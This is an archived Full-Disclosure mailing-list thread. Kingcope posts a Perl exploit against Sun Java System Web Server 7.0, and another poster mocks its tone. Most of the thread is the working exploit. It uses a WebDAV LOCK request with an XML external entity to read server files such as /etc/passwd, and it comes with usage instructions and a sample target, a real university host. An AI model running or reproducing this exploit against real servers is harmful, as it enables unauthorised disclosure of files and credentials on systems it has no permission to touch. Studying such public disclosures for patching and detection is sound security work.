www.isowarez.de - you have no idea what we're able to r0xx000Or 2010/4/3 Christian Sciberras <[email protected]>: > "Sun D3VS SM0KiNG PoT AGAiN" > "SuPP0RT iF YOU#RE kRAD KTHX" > > What the fuck is wrong with you guys? > Ever gave the psychiatrist a visit? > > > > > > > On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <[email protected]> wrote: >> >> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD >> KTHX >> >> #!/usr/bin/perl >> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT >> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo >> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo >> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo >> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !! >> # MAY/2010 >> # VERY THANKS TO LSD >> # >> # >> # oO VERiFIED oN Oo >> # >> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS >> SERVER 2008 & SunOS 5.10] >> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD >> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE] >> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX >> >> use IO::Socket; >> use MIME::Base64; >> >> print "//Sun Microsystems Sun Java System Web Server\n"; >> print "//Remote File Disclosure Exploit\n"; >> print "//by Kingcope\n"; >> print "May/2010\n"; >> >> if ($#ARGV != 2) { >> print "usage: perl sunone.pl <target> <webdav directory> <file to >> get>\n"; >> print "sample: perl sunone.pl lib7.berkeley.edu /dav >> /etc/passwd\n"; >> exit; >> } >> >> $target = $ARGV[0]; >> >> $|=1; >> >> $remotefile = $ARGV[2]; >> $folder = $ARGV[1]; >> >> $KRADXmL = >> "<?xml version=\"1.0\"?>\n" >> ."<!DOCTYPE REMOTE [\n" >> ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" >> ."]>\n" >> ."<D:lockinfo xmlns:D='DAV:'>\n" >> ."<D:lockscope><D:exclusive/></D:lockscope>\n" >> ."<D:locktype><D:write/></D:locktype>\n" >> ."<D:owner>\n" >> ."<D:href>\n" >> ."<REMOTE>\n" >> ."<RemoteX>&RemoteX;</RemoteX>\n" >> ."</REMOTE>\n" >> ."</D:href>\n" >> ."</D:owner>\n" >> ."</D:lockinfo>\n"; >> >> $sock = IO::Socket::INET->new(PeerAddr => $target, >> PeerPort => '80', >> Proto => 'tcp'); >> >> print $sock "LOCK /$folder HTTP/1.1\r\n". >> "Host: $target\r\n". >> "Depth: 0\r\n". >> "Connection: close\r\n". >> "Content-Type: application/xml\r\nContent-Length: >> ".length($KRADXmL)."\r\n\r\n". >> $KRADXmL; >> >> $locktoken = ""; >> while(<$sock>) { >> if ($_ =~ /^Lock-token:\s(.*)?\r/) { >> $locktoken = $1; >> chomp $locktoken; >> } >> print; >> } >> >> close($sock); >> >> $sock = IO::Socket::INET->new(PeerAddr => $target, >> PeerPort => '80', >> Proto => 'tcp'); >> >> print $sock "UNLOCK /$folder HTTP/1.1\r\n". >> "Host: $target\r\n". >> "Connection: close\r\n". >> "Lock-token: $locktoken\r\n\r\n"; >> >> while(<$sock>) { >> print; >> } >> close($sock); >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
